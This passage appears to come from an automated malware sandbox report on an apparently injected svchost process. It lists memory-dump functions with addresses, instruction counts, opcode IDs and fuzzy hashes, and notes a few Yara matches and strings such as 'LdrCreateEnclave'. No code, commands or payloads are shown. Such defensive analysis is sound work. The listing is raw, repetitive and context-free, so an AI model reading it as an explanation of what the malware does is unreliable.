                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Actx
                                                                                            • API String ID: 0-89312691
                                                                                            • Opcode ID: 1786f7db44108600ac67c2adcc705d04fcb853ac516809d007e3d7daf1071b9c
                                                                                            • Instruction ID: f256d26678ab7bb053f7cf2611d7cd4d7713507027e2cb9e96716aed25fb04c4
                                                                                            • Opcode Fuzzy Hash: 1786f7db44108600ac67c2adcc705d04fcb853ac516809d007e3d7daf1071b9c
                                                                                            • Instruction Fuzzy Hash: 23115130F49A028FEB24DA1DD8506B6F2E9EB97364F38852FF452DB391D672D8418780
                                                                                            Function 03AB106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrCreateEnclave
                                                                                            • API String ID: 0-3262589265
                                                                                            • Opcode ID: 5c7691c7d443701785bcbcdb92eeaf85b4f0f9beef43b37d6667c73fda5093a2
                                                                                            • Instruction ID: f7339886c24f0f9b86a058541bd63a05b53c3ec940793a936c8ea9a8cf0ec408
                                                                                            • Opcode Fuzzy Hash: 5c7691c7d443701785bcbcdb92eeaf85b4f0f9beef43b37d6667c73fda5093a2
                                                                                            • Instruction Fuzzy Hash: 8B21F3B1508344AFC320DF1A9944A9BFBE8FBD5B00F104A1FB5A49B251EBB09504CB92
                                                                                            Function 03A6E8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 64946e9dabe8aba28621b19d6e3227fc6d1afc83f8bebb0082a29be0db3791f8
                                                                                            • Instruction ID: 6fbce891d9f818f494d72422d15df822fdb05b6e321b029bfa68d0690afc47d2
                                                                                            • Opcode Fuzzy Hash: 64946e9dabe8aba28621b19d6e3227fc6d1afc83f8bebb0082a29be0db3791f8
                                                                                            • Instruction Fuzzy Hash: 72822472F102188BCB58CFADDC916DDB7F2EF88314B19812DE416EB349DA34AC568B45
                                                                                            Function 03A7516C Relevance: .8, Instructions: 785COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e65f05a1615ff5c1a4010c50d37bc8e815a76bfac9a4a9ec590de5eb281f5b41
                                                                                            • Instruction ID: b3bf6c691027b21751907d691d6345ae7fc044addd97febb5ee356fea1904e5d
                                                                                            • Opcode Fuzzy Hash: e65f05a1615ff5c1a4010c50d37bc8e815a76bfac9a4a9ec590de5eb281f5b41
                                                                                            • Instruction Fuzzy Hash: 24625D32D0464AAFCF25CF08D8D04AEFB62FE96314B49C59EC89A27604D371B955CBD1
                                                                                            Function 03A8739A Relevance: .7, Instructions: 705COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ef0f2544c8d3779d6d4dfb82d9006e13fa88ac152a3accf1697d6f605330f822
                                                                                            • Instruction ID: 16fc4a8226e41a7dac7f2e65bf8ef19f50a48dd95ae372ad31c2479c48160fe3
                                                                                            • Opcode Fuzzy Hash: ef0f2544c8d3779d6d4dfb82d9006e13fa88ac152a3accf1697d6f605330f822
                                                                                            • Instruction Fuzzy Hash: 9742B275A006168FDB19DF59C480ABEF7B6FF88314B28856ED552AB340D736EC42CB90
                                                                                            Function 03A85AA0 Relevance: .7, Instructions: 652COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                            • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                                            • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                            • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                                            Function 03A5B2C0 Relevance: .6, Instructions: 629COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 81e494968242cc8b720a761f4bc4784d10c50a1e615cb779630ed1133fa611cf
                                                                                            • Instruction ID: 04ce30bfdaf64d71ccf378f6251d18e3c83e7f2c93f7933e3fbf6e43a6a8eb55
                                                                                            • Opcode Fuzzy Hash: 81e494968242cc8b720a761f4bc4784d10c50a1e615cb779630ed1133fa611cf
                                                                                            • Instruction Fuzzy Hash: CF32AC75E01219DBCF24DFA8C980BAEBBB5FF54715F18012EE805AB391E7759901CBA0
                                                                                            Function 03AC8158 Relevance: .6, Instructions: 617COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 36288273c21941ba712983c5444f9dc88ccb2a445f7ab2e76d51a11f6a204ffe
                                                                                            • Instruction ID: b2c15091a90cc1cc3985413d2d490fcdda3ea1932f2c04ed60bf5e88c10863ba
                                                                                            • Opcode Fuzzy Hash: 36288273c21941ba712983c5444f9dc88ccb2a445f7ab2e76d51a11f6a204ffe
                                                                                            • Instruction Fuzzy Hash: 28424A75A102599FDB24CF69C981BADF7F9BF88300F18819EE849EB241D7389985CF50
                                                                                            Function 03A42840 Relevance: .6, Instructions: 605COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 065ecc1c65ee976f6b369168ba7db29f7802cbd6bac046efdb413d9ba4b45358
                                                                                            • Instruction ID: 2bfcdc2998f07bb6f57392fc971a6311871a03aea88db90e97db48ad4b90c19e
                                                                                            • Opcode Fuzzy Hash: 065ecc1c65ee976f6b369168ba7db29f7802cbd6bac046efdb413d9ba4b45358
                                                                                            • Instruction Fuzzy Hash: 5532DD74A007558BEF24CF69C944BBEFBF6AF84314F18855FE486AB294DB35A801CB50
                                                                                            Function 03ADA118 Relevance: .6, Instructions: 591COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b961176c4f6c4d008ea44a96ce7d27a4b3b43b675b9232768e10d619f2a17901
                                                                                            • Instruction ID: 87f764a26d766adcee432b7554d6a7f803e4bbc619688835f37feaea24baf18e
                                                                                            • Opcode Fuzzy Hash: b961176c4f6c4d008ea44a96ce7d27a4b3b43b675b9232768e10d619f2a17901
                                                                                            • Instruction Fuzzy Hash: 3422AB742046618BDB28CF29C094772B7F1AF45304F08889FE897CF686E739E592DB61
                                                                                            Function 03AF16CC Relevance: .6, Instructions: 571COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d589941aece0bcede756f4604df1a334bb86b86965d5e6884488ead82d2ebb37
                                                                                            • Instruction ID: 287ff0ca072b195f876349ec591eb16c6143cd7d0fe933948c9601898a150334
                                                                                            • Opcode Fuzzy Hash: d589941aece0bcede756f4604df1a334bb86b86965d5e6884488ead82d2ebb37
                                                                                            • Instruction Fuzzy Hash: E522C335A00216CFCB19CF99C580ABAF3B2FF89314B18456EE655DB344DB34E942CB90
                                                                                            Function 03A5FB80 Relevance: .6, Instructions: 559COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4a63ee264ef4f64deadc8d159b05abd103338748a5a7b860e26c317acb37ee74
                                                                                            • Instruction ID: 7d9423239c206e83e48264a510a76ab65fad31c980a57d05a1c3bd774e68a426
                                                                                            • Opcode Fuzzy Hash: 4a63ee264ef4f64deadc8d159b05abd103338748a5a7b860e26c317acb37ee74
                                                                                            • Instruction Fuzzy Hash: 5522C376900609DFDB10DFA8C984BAEB7B5FF88314F1486ABE8149B345E734DA45CB90
                                                                                            Function 03AF1D5A Relevance: .6, Instructions: 559COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 010c80d2b74bfcffc7959ee126e5faf0a40012bd2321fe53c0fa4699254a5fd4
                                                                                            • Instruction ID: 1d437bc637994d3992a72425f0fbfaae8e3bf18cb03c79e04429648cfe023f1b
                                                                                            • Opcode Fuzzy Hash: 010c80d2b74bfcffc7959ee126e5faf0a40012bd2321fe53c0fa4699254a5fd4
                                                                                            • Instruction Fuzzy Hash: 7C228F796047128FC718CF59C490A2AF3E5FF89314B188A6EFA96CB355D730E842CB91
                                                                                            Function 03A58DBF Relevance: .6, Instructions: 554COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ca1204758695afc4632570382ca9c3d6f7a9d63c5db51cf53951cfe7028869a1
                                                                                            • Instruction ID: 94df3cf246010cfaafb1c0041b3ecd38d6ee7f8b71d6a42ad1d269ada8b0e0de
                                                                                            • Opcode Fuzzy Hash: ca1204758695afc4632570382ca9c3d6f7a9d63c5db51cf53951cfe7028869a1
                                                                                            • Instruction Fuzzy Hash: 0E222D74E00216DBDF15CF95C5809BEFBFABF88704B18849BE845AB241E738D981CB64
                                                                                            Function 03AF2446 Relevance: .5, Instructions: 485COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f549744c47dda49088779e27412f38d33cf21f1d752a09c8a2df7f4c60cdac0b
                                                                                            • Instruction ID: b62ed8de75b2f781a22b7813e12d41d21ccbffb24ed0dd0a4fb1a4ea06d110a2
                                                                                            • Opcode Fuzzy Hash: f549744c47dda49088779e27412f38d33cf21f1d752a09c8a2df7f4c60cdac0b
                                                                                            • Instruction Fuzzy Hash: 3202C0386046518FDB64CFAAC490375F7F1AF85300B58899FFA96CB281D738D842DB60
                                                                                            Function 03B0B16B Relevance: .4, Instructions: 450COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be258b6fea864cf4359b95138e98d4eecbe63f075bef0091efeb3ae75aecbb48
                                                                                            • Instruction ID: 3b811accfb1cfa5ce37e2aabf50c2229fa77ce07ce53558ac097391ac4897ee2
                                                                                            • Opcode Fuzzy Hash: be258b6fea864cf4359b95138e98d4eecbe63f075bef0091efeb3ae75aecbb48
                                                                                            • Instruction Fuzzy Hash: 73F1C372E006159BCB18CFA9C9A067EFFF5EF98214B1941B9D456DB3C0E634EA41CB90
                                                                                            Function 00410173 Relevance: .4, Instructions: 435COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                            • Instruction ID: 1d7445901ad3d4edfdedc228e69f0dcd04ca8f524cba06b69e646b19a8f1f8f6
                                                                                            • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                            • Instruction Fuzzy Hash: D7026E73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                                                                            Function 03B0A9A6 Relevance: .4, Instructions: 425COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3d0c96eb65a7642ed681ea43d694a6d50155b34cfb25b6159460166aa3404c5d
                                                                                            • Instruction ID: d1e54e0368da9e29f3f0aed82128caba8a998576649fb9c4ca28242c9b9f0125
                                                                                            • Opcode Fuzzy Hash: 3d0c96eb65a7642ed681ea43d694a6d50155b34cfb25b6159460166aa3404c5d
                                                                                            • Instruction Fuzzy Hash: CFF19372E006269BCB28CE68C9A05BDFFB5EF45214B1946B9D856EB3C0D734DE41CB90
                                                                                            Function 03A5FDC0 Relevance: .4, Instructions: 390COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a51140e4b3c33dccd1baca5e0a7e9211dd1cbc8a339bc323443e3f4bac182357
                                                                                            • Instruction ID: 6a4a050eae1b7e7f7f1533120f3ed1f1b40df9eb20d4c6b5a0700e11c6d87b1e
                                                                                            • Opcode Fuzzy Hash: a51140e4b3c33dccd1baca5e0a7e9211dd1cbc8a339bc323443e3f4bac182357
                                                                                            • Instruction Fuzzy Hash: 52F1C175900609DFDB14DFA8C980BAEB7B5FF48304F1886AAE815EB345E734DA45CB90
                                                                                            Function 00402073 Relevance: .4, Instructions: 383COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e46fd6d0a1d841b8604bbc54a2ac79415a4bbf07894b8e283f8db1d19a4d9b86
                                                                                            • Instruction ID: 927d3428b01d58fea038c7f0fc5786fa773a0886d2df4d44e84bea54f7504ba6
                                                                                            • Opcode Fuzzy Hash: e46fd6d0a1d841b8604bbc54a2ac79415a4bbf07894b8e283f8db1d19a4d9b86
                                                                                            • Instruction Fuzzy Hash: ABB144316181858BCB29D978C99C2D97BA2EB9A354F1C41BEC440EF7C3E67E8807C385
                                                                                            Function 03A28397 Relevance: .4, Instructions: 380COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 14e75e358f1a09723d4d273bd3d76b0a0eccc906416f42f7285a237e64899909
                                                                                            • Instruction ID: 939cfa0ea574c21447ad650e9f46939894ca7ff5000eaa234cc67455e4292d0b
                                                                                            • Opcode Fuzzy Hash: 14e75e358f1a09723d4d273bd3d76b0a0eccc906416f42f7285a237e64899909
                                                                                            • Instruction Fuzzy Hash: 22D1C575A007269FCB14DF68C990ABABBB9BF54304F08466FF816DB280E738D945C760
                                                                                            Function 03A5C6E0 Relevance: .4, Instructions: 367COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: af788007d720981c2ddcd809ac01adda6874c23c630ef7df2aea005a9ff55447
                                                                                            • Instruction ID: b2ffc979e7cadfe790f9783d28e1dbfa097eb35e5f5a32582f4532ce140d7aa8
                                                                                            • Opcode Fuzzy Hash: af788007d720981c2ddcd809ac01adda6874c23c630ef7df2aea005a9ff55447
                                                                                            • Instruction Fuzzy Hash: CAD16971E043199BEF28CF98C5847BDBBB6FB45320F18806FE942AB699D7748941CB44
                                                                                            Function 03A438E0 Relevance: .3, Instructions: 349COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5410c8bf43a3cbe9b2bcd24f4c5d99b76ae36e1554b39ae63c944b738f609520
                                                                                            • Instruction ID: 903f77be1ac4cbca7fe8baf5e9558ff801441611d76a48730291500461cb91d8
                                                                                            • Opcode Fuzzy Hash: 5410c8bf43a3cbe9b2bcd24f4c5d99b76ae36e1554b39ae63c944b738f609520
                                                                                            • Instruction Fuzzy Hash: 59E18D75A00205CFDB18CF59C990BAAB7F5FF98310F2881AEE855AB791D730E951CB90
                                                                                            Function 03A4CFE0 Relevance: .3, Instructions: 345COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 75a722c63460b45cf499efff8fdd3bf73e73ceb327c6b226970a47f4706e03cf
                                                                                            • Instruction ID: f4b7adac504025bebbe3cadeac8e0987fca3345e1a0651529aef0ab6ce85b13f
                                                                                            • Opcode Fuzzy Hash: 75a722c63460b45cf499efff8fdd3bf73e73ceb327c6b226970a47f4706e03cf
                                                                                            • Instruction Fuzzy Hash: 54D1B431A003198FDB35DB19C994BAAF7B5BB89304F0841EFD9099B242D774AD85CB51
                                                                                            Function 03A3D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2a5f30605faa9238452d1ae9b346d32fcb01466614ddf09d838fb08675a92b04
                                                                                            • Instruction ID: 91b341f987e0021196cfe70de431e38e2335d18662574aba47b70191637fdce5
                                                                                            • Opcode Fuzzy Hash: 2a5f30605faa9238452d1ae9b346d32fcb01466614ddf09d838fb08675a92b04
                                                                                            • Instruction Fuzzy Hash: 3FC17375E002159BEF14CF5AC940BAEF7B5EB59314F18826FE815AB390D774A942CB80
                                                                                            Function 03AB8243 Relevance: .3, Instructions: 322COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                            • Instruction ID: c3b8d86407b2679d645a641917bf6fabe3876ff33f0c1963e09ceecf27313c6c
                                                                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                            • Instruction Fuzzy Hash: F7B15074A00744AFDB28DF99C940EEBB7BDFF84304F14446EA9529B796DA38E905CB10
                                                                                            Function 03A40535 Relevance: .3, Instructions: 300COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                            • Instruction ID: e9098882c6ac9fdd2b330ae05871ab73bbd017513b3bbca89b0527953fd76a6d
                                                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                            • Instruction Fuzzy Hash: F0B12435600645AFDF21DB68C940BBEFBF6EF89200F18459BD642AB381DB30E941DB90
                                                                                            Function 03A590DB Relevance: .3, Instructions: 287COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4914fbd8ec3692c8f7878bc08d4f8b373f961683d4bb13091dadd7dd0d0973c6
                                                                                            • Instruction ID: 866d99ded5bffed84e667a391d276ea3bec99fc0a362cf048515939d6cbaa721
                                                                                            • Opcode Fuzzy Hash: 4914fbd8ec3692c8f7878bc08d4f8b373f961683d4bb13091dadd7dd0d0973c6
                                                                                            • Instruction Fuzzy Hash: FDA14975900215AFEF26EFA4CC85FAFB7B9AF55750F05005AFA00AF2A0D7759850CBA0
                                                                                            Function 03A383C0 Relevance: .3, Instructions: 281COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: befdeb9fb5d91676861ffe5249d53370050a301aec4a6d7fe08440b3cb12d4de
                                                                                            • Instruction ID: eb15f13e897bb9a97d4ae893c550052aea872bc8d3120c3dc2290b1a5d3b8ed3
                                                                                            • Opcode Fuzzy Hash: befdeb9fb5d91676861ffe5249d53370050a301aec4a6d7fe08440b3cb12d4de
                                                                                            • Instruction Fuzzy Hash: 72C129745083418FDB64CF19C494BABB7E9BF88304F44496EF9899B390D778E909CB92
                                                                                            Function 03A70185 Relevance: .3, Instructions: 276COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: db6254167b5318c7f9b9a1d8bb7c1ed3fae916c08aec39784e658436694685aa
                                                                                            • Instruction ID: 9e72d4e71278ca5f4157e799e2c682b328f03e738fffbdb233227cac67a64f58
                                                                                            • Opcode Fuzzy Hash: db6254167b5318c7f9b9a1d8bb7c1ed3fae916c08aec39784e658436694685aa
                                                                                            • Instruction Fuzzy Hash: 6FA1AD75B0071A9BDB24DF69C9D0BAAB7F5FF54314F04412EEA459B281EB38E811CB90
                                                                                            Function 03AB60E0 Relevance: .3, Instructions: 264COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
